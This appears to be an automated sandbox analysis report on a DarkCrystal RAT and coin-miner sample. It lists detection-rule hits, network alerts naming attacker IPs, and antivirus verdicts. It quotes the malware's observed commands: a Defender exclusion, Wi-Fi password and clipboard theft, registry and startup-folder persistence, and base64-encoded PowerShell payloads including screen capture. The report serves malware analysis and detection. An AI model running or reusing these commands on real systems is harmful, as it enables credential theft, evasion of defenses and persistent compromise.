LQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 8052, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7624, ProcessName: wscript.exe

Sigma detected: Suspicious Startup Folder Persistence

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 7748, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\RuntimeBroker.exe" , CommandLine: "C:\Users\user\AppData\Roaming\RuntimeBroker.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\RuntimeBroker.exe, NewProcessName: C:\Users\user\AppData\Roaming\RuntimeBroker.exe, OriginalFileName: C:\Users\user\AppData\Roaming\RuntimeBroker.exe, ParentCommandLine: "C:\Users\user\Desktop\87Bym0x4Fy.exe", ParentImage: C:\Users\user\Desktop\87Bym0x4Fy.exe, ParentProcessId: 6912, ParentProcessName: 87Bym0x4Fy.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\RuntimeBroker.exe" , ProcessId: 6864, ProcessName: RuntimeBroker.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 8052, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7624, ProcessName: wscript.exe

Sigma detected: Windows Binaries Write Suspicious Extensions

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\RuntimeBroker.exe, ProcessId: 6864, TargetFilename: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\cscript.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cscript

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\user\cscript.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7436, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe", ParentImage: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ParentProcessId: 7436, ParentProcessName: ChainComServermonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline", ProcessId: 5448, ProcessName: csc.exe

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7748, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 5900, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7748, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ProcessId: 7924, ProcessName: cmd.exe

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 7748, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 7748, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87Bym0x4Fy.exe", ParentImage: C:\Users\user\Desktop\87Bym0x4Fy.exe, ParentProcessId: 6912, ParentProcessName: 87Bym0x4Fy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA=", ProcessId: 7068, ProcessName: powershell.exe

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: "C:\Users\user\NetHood\powershell.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 7748, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe, ParentProcessId: 7856, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 8052, ProcessName: svchost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 8052, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7624, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7436, TargetFilename: C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87Bym0x4Fy.exe", ParentImage: C:\Users\user\Desktop\87Bym0x4Fy.exe, ParentProcessId: 6912, ParentProcessName: 87Bym0x4Fy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA=", ProcessId: 7068, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 7320, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe", ParentImage: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ParentProcessId: 7436, ParentProcessName: ChainComServermonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline", ProcessId: 5448, ProcessName: csc.exe

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7748, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 5000, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO COINMINER XMR CoinMiner Usage - Source IP: 192.168.2.4 - Destination IP: 45.76.89.70

Timestamp:	2024-08-01T10:57:10.753831+0200
SID:	2826930
Source Port:	49748
Destination Port:	443
Protocol:	TCP
Classtype:	Crypto Currency Mining Activity Detected

ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) - Source IP: 192.168.2.4 - Destination IP: 194.58.42.154

Timestamp:	2024-08-01T10:58:33.850462+0200
SID:	2048130
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-01T10:58:09.528507+0200
SID:	2036289
Source Port:	55793
Destination Port:	53
Protocol:	UDP
Classtype:	Crypto Currency Mining Activity Detected

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) - Source IP: 192.168.2.4 - Destination IP: 194.58.42.154

Timestamp:	2024-08-01T10:57:57.535717+0200
SID:	2048095
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 87Bym0x4Fy.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ProgramData\setup.exe	Avira: detection malicious, Label: TR/CoinMiner.lnxah
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Google\Chrome\updater.exe	Avira: detection malicious, Label: TR/CoinMiner.lnxah
Source: C:\ProgramData\svchost.exe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\VbvGgiO8yC.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Uninstall Information\cmd.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe	ReversingLabs: Detection: 91%
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe	Virustotal: Detection: 58%	Perma Link
Source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe	ReversingLabs: Detection: 91%
Source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe	Virustotal: Detection: 58%	Perma Link
Source: C:\Program Files\Google\Chrome\updater.exe	ReversingLabs: Detection: 71%
Source: C:\Program Files\Google\Chrome\updater.exe	Virustotal: Detection: 79%	Perma Link
Source: C:\Program Files\Uninstall Information\cmd.exe	ReversingLabs: Detection: 91%
Source: C:\Program Files\Uninstall Information\cmd.exe	Virustotal: Detection: 58%	Perma Link
Source: C:\ProgramData\Microsoft\based.exe	ReversingLabs: Detection: 51%
Source: C:\ProgramData\Microsoft\based.exe	Virustotal: Detection: 46%	Perma Link
Source: C:\ProgramData\Microsoft\hacn.exe	ReversingLabs: Detection: 70%
Source: C:\ProgramData\Microsoft\hacn.exe	Virustotal: Detection: 61%	Perma Link
Source: C:\ProgramData\setup.exe	ReversingLabs: Detection: 71%
Source: C:\ProgramData\setup.exe	Virustotal: Detection: 79%	Perma Link
Source: C:\ProgramData\svchost.exe	ReversingLabs: Detection: 60%
Source: C:\ProgramData\svchost.exe	Virustotal: Detection: 52%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	ReversingLabs: Detection: 57%
